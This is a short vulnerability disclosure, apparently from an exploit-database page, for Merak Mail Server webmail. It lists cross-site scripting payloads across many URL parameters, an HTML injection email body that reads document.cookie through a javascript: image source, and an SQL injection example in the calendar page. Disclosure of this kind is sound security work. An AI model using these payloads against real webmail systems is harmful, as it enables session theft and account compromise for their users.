|
Merak Mail Server Webmail Multiple Vulnerabilities
An exploit is not required. Examples were provided: Cross-site scripting examples: /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext= /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext= /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS] /address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext= /address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext= /address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext= /settings.html?autoresponder=1&id=[id]&spage=">[XSS] /settings.html?autoresponder=">[XSS]&id=[id]&spage=0 /readmail.html?id=[id]&folder=">[XSS] /attachment.html?attachmentpage_text_error=">[XSS] /calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=<script>alert()</script> /calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS] /calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8 HTML injection example, email body contents: <IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME> SQL injection example: /calendar.html?id=1'&schedule=[SQL] |
|
 Privacy Statement |
